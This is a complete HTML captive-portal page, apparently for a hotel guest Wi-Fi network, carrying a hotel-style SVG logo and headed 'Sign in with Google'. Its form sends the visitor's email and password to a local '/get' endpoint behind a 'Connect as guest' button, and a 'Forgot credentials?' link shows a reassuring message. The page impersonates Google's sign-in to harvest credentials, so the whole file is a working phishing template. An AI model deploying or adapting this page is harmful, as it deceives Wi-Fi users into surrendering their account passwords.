<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #FFC72C;
  margin-right: 100px
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #1E22AA;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #1E22AA;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #1E22AA;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #1E22AA;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  display: block;
  margin: auto;
}

.submit-btn:hover {
  background: #FFC72C;
}

.forgot-password {
  display: block;
  text-align: center;
  color: #1E22AA;
  text-decoration: underline;
  margin-top: 10px;
}

.error-message {
  color: red;
  text-align: center;
  display: none; 
  margin-top: 10px;
}


</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
  <svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="500.000000pt" height="195.000000pt" viewBox="0 0 5000.000000 1957.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,1957.000000) scale(0.100000,-0.100000)"
fill="#1E22AA" stroke="none">
<path d="M30493 19498 c-45 -40 -164 -149 -265 -243 -2405 -2228 -5014 -3525
-8003 -3980 -564 -85 -1077 -137 -1755 -176 -243 -14 -1334 -20 -1615 -9 -253
10 -724 37 -805 46 -128 14 33 -48 276 -106 893 -216 1779 -350 2544 -385 69
-3 153 -8 186 -11 109 -10 902 -6 1109 6 2072 111 3892 684 5445 1715 357 237
688 489 1010 771 173 150 681 658 834 834 360 412 728 915 983 1345 145 245
156 265 146 265 -4 0 -45 -33 -90 -72z"/>
<path d="M11505 11753 c-376 -26 -649 -77 -937 -174 -1150 -388 -1862 -1350
-1958 -2644 -92 -1249 410 -2351 1331 -2920 424 -262 906 -418 1439 -465 879
-77 1716 123 2315 553 373 268 662 611 870 1031 211 429 314 873 332 1421 19
617 -124 1256 -388 1730 -172 307 -431 616 -694 825 -539 428 -1287 659 -2095
648 -96 -1 -193 -3 -215 -5z m519 -1114 c689 -70 1212 -440 1461 -1033 124
-297 177 -586 177 -971 -1 -846 -338 -1469 -958 -1773 -277 -137 -587 -202
-960 -202 -846 -1 -1457 379 -1739 1080 -198 492 -214 1177 -39 1708 153 466
444 810 854 1009 340 165 755 228 1204 182z"/>
<path d="M26825 11750 c-339 -26 -661 -95 -965 -206 -167 -62 -445 -205 -605
-312 -302 -202 -518 -416 -727 -717 -409 -591 -592 -1381 -517 -2235 70 -796
424 -1528 969 -2001 199 -173 379 -291 635 -415 439 -213 896 -316 1445 -327
825 -15 1516 187 2095 614 127 95 354 315 462 449 356 441 559 936 645 1571
19 140 22 210 23 474 0 316 -6 401 -46 640 -84 504 -267 948 -543 1318 -485
652 -1208 1037 -2131 1137 -136 15 -593 21 -740 10z m595 -1111 c310 -34 616
-136 835 -279 379 -248 629 -627 739 -1120 89 -403 84 -854 -14 -1243 -187
-737 -695 -1194 -1460 -1312 -144 -22 -465 -31 -615 -16 -749 73 -1272 453
-1522 1105 -45 118 -96 320 -119 471 -23 151 -27 616 -6 765 56 398 180 717
380 982 371 490 1029 729 1782 647z"/>
<path d="M0 8647 c0 -2387 3 -2996 13 -2999 10 -3 447 -3 1004 1 l153 1 2
2167 3 2167 133 -129 c277 -268 610 -681 1102 -1365 52 -72 109 -152 249 -345
688 -951 1131 -1469 1586 -1851 451 -379 909 -592 1365 -634 96 -9 470 -16
588 -11 l32 1 0 2995 0 2995 -585 0 -585 0 0 -2255 c0 -1240 -3 -2255 -6
-2255 -13 0 -233 203 -350 322 -297 302 -556 621 -1109 1363 -148 198 -347
466 -444 595 -987 1325 -1616 1932 -2226 2150 -183 65 -237 72 -597 77 l-328
5 0 -2995z"/>
<path d="M16260 11636 c0 -4 603 -1268 910 -1906 67 -140 153 -318 190 -395
37 -77 323 -671 635 -1320 312 -649 666 -1387 787 -1640 121 -253 253 -529
294 -613 l73 -152 287 2 287 3 734 1515 c1074 2215 2164 4472 2170 4493 5 16
-30 17 -676 15 l-682 -3 -378 -845 c-802 -1791 -1074 -2400 -1257 -2812 -104
-236 -192 -428 -195 -428 -5 0 -932 2066 -1585 3533 l-249 557 -672 0 c-370 0
-673 -2 -673 -4z"/>
<path d="M31560 11110 l0 -530 33 -1 c17 0 501 0 1075 0 l1042 2 0 -2464 c0
-2339 1 -2465 18 -2469 14 -3 1089 -2 1145 1 16 1 17 125 17 2466 l0 2466
1065 -2 c674 -1 1069 1 1076 8 6 6 8 205 7 529 l-3 519 -2737 3 -2738 2 0
-530z"/>
<path d="M38953 9483 c3 -1993 4 -2167 20 -2273 49 -317 136 -588 253 -783
322 -534 874 -807 1773 -877 172 -13 874 -13 1091 0 405 25 846 82 1173 151
l47 11 0 544 0 544 -32 -6 c-18 -3 -55 -10 -83 -15 -227 -41 -737 -93 -1080
-109 -248 -12 -741 -11 -945 1 -502 30 -805 180 -941 464 -84 174 -112 378
-107 779 l3 236 1468 0 1467 0 0 550 0 550 -1470 0 -1470 0 0 644 0 645 1578
-3 c867 -1 1585 0 1595 2 16 4 17 39 17 553 l0 549 -2180 0 -2181 0 4 -2157z"/>
<path d="M45763 9523 c4 -2274 2 -2170 53 -2468 54 -313 179 -628 328 -825
267 -353 679 -566 1251 -649 234 -34 385 -42 745 -42 497 0 812 17 1210 67
188 23 591 87 633 100 16 5 17 40 17 545 l0 541 -27 -6 c-89 -18 -537 -67
-823 -90 -497 -40 -1175 -46 -1416 -12 -467 66 -683 259 -767 686 -21 104 -21
129 -24 2188 l-4 2082 -590 0 -590 0 4 -2117z"/>
<path d="M9876 2069 c-119 -16 -198 -38 -291 -84 -247 -120 -421 -358 -488
-665 -29 -131 -30 -415 -3 -540 49 -225 165 -438 304 -558 172 -148 383 -222
631 -222 493 1 840 310 937 835 25 136 15 385 -20 520 -32 122 -115 295 -189
390 -63 82 -167 173 -253 221 -167 93 -401 132 -628 103z m339 -249 c101 -31
190 -84 268 -159 152 -146 237 -370 237 -627 0 -326 -150 -609 -382 -723 -117
-58 -192 -75 -318 -74 -122 0 -202 19 -300 68 -164 83 -290 246 -356 460 -26
85 -28 101 -28 275 0 173 2 191 27 273 71 229 187 376 372 468 142 71 326 86
480 39z"/>
<path d="M20085 2074 c-221 -35 -366 -108 -444 -225 -144 -216 -124 -498 48
-669 95 -94 192 -136 543 -234 231 -64 365 -153 403 -265 42 -127 -6 -283
-111 -364 -96 -73 -283 -108 -476 -88 -109 12 -315 59 -432 100 -33 12 -63 21
-68 21 -4 0 -8 -51 -8 -113 l0 -113 98 -32 c287 -93 595 -117 805 -63 202 53
376 202 427 369 72 233 0 482 -174 607 -95 68 -194 109 -406 170 -220 63 -316
101 -391 153 -127 89 -155 279 -58 395 83 100 307 155 526 128 75 -9 270 -54
381 -87 22 -6 22 -6 22 108 l0 114 -98 27 c-54 15 -136 34 -183 43 -83 15
-345 27 -404 18z"/>
<path d="M32308 2070 c-178 -28 -283 -76 -367 -166 -69 -74 -115 -162 -136
-259 -18 -88 -19 -142 -1 -227 45 -209 180 -330 464 -412 67 -20 176 -52 242
-71 133 -39 240 -88 294 -136 91 -79 118 -233 63 -354 -50 -108 -118 -161
-250 -194 -198 -51 -411 -30 -720 69 -55 17 -102 29 -105 25 -4 -3 -8 -53 -10
-109 l-4 -104 58 -22 c91 -33 220 -69 319 -88 127 -23 423 -23 520 1 226 56
398 213 450 408 31 116 14 302 -36 402 -88 174 -217 251 -584 348 -374 98
-486 188 -473 378 9 127 77 209 213 260 165 62 351 51 657 -38 58 -17 111 -31
117 -31 8 0 11 35 9 117 l-3 117 -60 18 c-144 44 -299 69 -450 73 -82 2 -176
0 -207 -5z"/>
<path d="M35021 2069 c-323 -40 -577 -233 -711 -538 -78 -178 -108 -431 -81
-668 44 -379 269 -686 589 -803 236 -86 543 -78 759 20 248 113 432 342 507
632 27 102 48 303 41 378 -2 25 -6 77 -9 116 -13 159 -83 357 -176 494 -88
130 -235 251 -371 306 -145 59 -373 86 -548 63z m241 -229 c303 -44 519 -267
590 -610 16 -76 19 -120 15 -225 -6 -149 -28 -250 -82 -364 -98 -207 -247
-337 -445 -388 -85 -21 -243 -21 -335 1 -250 60 -435 262 -507 553 -31 127
-31 342 0 467 77 305 277 511 547 561 87 16 131 17 217 5z"/>
<path d="M42756 2070 c-90 -14 -201 -47 -259 -76 -108 -55 -199 -182 -237
-330 -47 -183 -3 -363 117 -482 98 -97 185 -135 560 -241 228 -65 329 -125
377 -224 95 -197 -20 -414 -249 -471 -118 -30 -315 -26 -489 10 -70 14 -266
69 -318 89 -17 7 -18 -2 -18 -109 l0 -115 98 -30 c207 -63 304 -81 473 -88
155 -6 263 6 370 42 210 72 346 206 394 392 19 71 19 221 1 290 -35 130 -106
229 -219 303 -81 53 -173 88 -392 148 -282 79 -358 112 -423 186 -18 20 -39
53 -48 74 -24 54 -22 147 4 204 29 67 103 141 165 168 60 26 179 49 256 50 88
0 255 -29 385 -67 66 -20 131 -38 144 -41 l23 -4 -3 118 -3 118 -75 23 c-191
58 -480 87 -634 63z"/>
<path d="M23685 2055 c-158 -29 -278 -102 -352 -213 -55 -82 -74 -145 -80
-263 -6 -111 7 -167 67 -297 l39 -82 -42 -27 c-66 -41 -166 -142 -212 -213
-196 -300 -147 -662 113 -842 68 -47 161 -85 252 -104 103 -20 321 -15 420 11
92 24 234 94 309 151 35 27 72 55 82 62 16 12 28 3 120 -92 l102 -106 158 0
c88 0 159 3 159 7 0 4 -89 97 -197 205 l-197 197 26 83 c15 46 32 110 39 143
14 69 18 297 6 368 l-8 47 -105 0 -104 0 0 -142 c0 -90 -6 -176 -16 -232 l-17
-89 -277 279 c-410 414 -464 487 -464 639 0 129 53 215 169 269 117 56 256 58
473 6 68 -17 127 -30 131 -30 4 0 6 21 5 48 -1 26 -2 74 -3 108 l-1 60 -87 22
c-49 12 -117 26 -153 32 -88 13 -270 11 -355 -5z m140 -1336 l310 -310 -40
-35 c-106 -92 -250 -151 -390 -161 -146 -10 -280 31 -378 117 -180 158 -125
471 116 661 27 22 54 39 60 39 7 0 152 -140 322 -311z"/>
<path d="M6331 2042 c-8 -3 -11 -303 -11 -1004 l0 -1001 108 6 c59 4 115 6
125 7 16 0 17 28 17 450 l0 450 553 -2 552 -3 1 -442 c1 -244 2 -447 3 -453 1
-6 49 -10 121 -10 l120 0 0 999 c0 790 -3 1000 -12 1003 -11 4 -199 3 -228 -1
-7 -1 -9 -147 -7 -426 l2 -425 -552 0 -553 0 0 425 c0 234 -3 426 -7 426 -21
3 -223 4 -232 1z"/>
<path d="M11820 2042 c-6 -2 -10 -50 -10 -118 l0 -114 188 -1 c103 0 265 0
360 0 l172 1 0 -885 0 -885 120 0 120 0 0 884 0 884 338 0 c185 0 347 1 360 1
22 1 22 3 22 121 l0 121 -830 -3 c-456 -2 -834 -4 -840 -6z"/>
<path d="M14690 1252 c0 -763 1 -802 20 -876 51 -202 148 -294 360 -343 140
-32 543 -26 793 13 l37 6 0 107 c0 59 -2 110 -5 112 -2 3 -64 -1 -137 -9 -73
-8 -218 -15 -323 -15 -167 -1 -201 1 -282 22 -87 21 -95 25 -138 73 -77 85
-89 140 -89 403 l-1 220 460 0 460 0 0 115 0 115 -462 3 -463 2 0 304 0 304
383 0 c210 0 428 1 485 1 l102 1 0 115 c0 85 -3 115 -12 116 -7 0 -277 3 -600
5 l-588 5 0 -799z"/>
<path d="M17300 2042 c-14 -5 -13 -1605 1 -1692 12 -77 49 -164 87 -203 41
-43 121 -85 208 -109 73 -20 101 -22 359 -22 279 0 468 17 484 42 3 6 8 56 9
113 l3 102 -73 -6 c-329 -27 -420 -30 -540 -19 -67 7 -141 17 -163 23 -50 14
-109 72 -126 124 -11 31 -15 213 -19 845 l-5 805 -107 0 c-60 0 -112 -1 -118
-3z"/>
<path d="M26863 2043 l-163 -3 0 -1000 0 -1000 120 0 120 0 0 410 0 410 209 0
210 0 48 -70 c26 -39 77 -113 113 -164 36 -51 108 -154 160 -230 52 -75 129
-185 171 -244 l75 -107 143 -3 c124 -2 143 -1 138 13 -8 19 -73 115 -350 518
-134 194 -221 330 -214 332 83 29 155 59 193 81 104 61 194 187 228 320 51
196 -12 425 -153 564 -77 76 -146 112 -263 140 -168 39 -253 42 -785 33z m675
-249 c198 -39 294 -148 295 -334 1 -139 -61 -253 -165 -304 -108 -52 -152 -59
-450 -63 l-278 -5 0 361 0 361 260 0 c196 0 280 -4 338 -16z"/>
<path d="M29388 2039 c-6 -4 -8 -298 -5 -805 3 -729 5 -804 21 -859 44 -148
122 -253 223 -298 111 -49 205 -62 458 -62 200 0 305 7 468 31 l37 6 0 109 0
109 -33 0 c-18 0 -113 -7 -212 -16 -209 -19 -381 -14 -498 15 -67 16 -85 25
-122 61 -24 24 -54 66 -67 94 -22 48 -23 65 -26 294 l-3 242 85 1 c105 2 495
6 686 8 l140 1 0 115 0 115 -455 0 -455 0 0 304 0 304 343 0 c188 0 402 1 475
1 l133 1 -3 118 -3 117 -588 0 c-324 0 -593 -3 -599 -6z"/>
<path d="M37412 2043 l-162 -3 2 -998 3 -997 115 0 115 0 3 408 2 407 209 0
208 0 47 -67 c26 -38 97 -140 158 -228 61 -88 137 -198 170 -245 33 -47 90
-129 126 -182 l67 -97 144 -1 c124 0 142 2 137 15 -5 14 -458 678 -541 794
-27 37 -33 52 -23 56 7 3 39 14 71 25 324 110 460 474 299 800 -73 147 -207
249 -377 284 -164 34 -263 38 -773 29z m728 -259 c160 -49 241 -158 242 -325
1 -184 -85 -292 -277 -345 -47 -13 -120 -18 -337 -21 l-278 -5 0 361 0 361
293 -3 c257 -3 300 -6 357 -23z"/>
<path d="M39590 2042 c-6 -2 -10 -50 -10 -118 l0 -114 28 -1 c15 0 174 -1 355
0 l327 0 0 -885 0 -884 120 0 120 0 0 884 0 884 308 0 c169 0 331 1 360 1 l52
1 0 120 0 121 -825 -3 c-454 -2 -829 -4 -835 -6z"/>
</g>
</svg>

  </div>

  <div class="form-container">

    <center><h1>Sign in with Google</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email or mobile phone number" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

      <button class="submit-btn" type="submit">Connect as guest</button>
	  <a href="javascript:void(0);" class="forgot-password">Forgot credentials?</a>
	<div class="error-message"></div>

    </form>

  </div>

</div>
<script>
  document.querySelector('.forgot-password').addEventListener('click', function() {
    var errorMessage = document.querySelector('.error-message');
    errorMessage.innerHTML = "Please refer to your Google account if you forgot your credentials";
    errorMessage.style.display = 'block';
  });
</script>
</body>
</html>
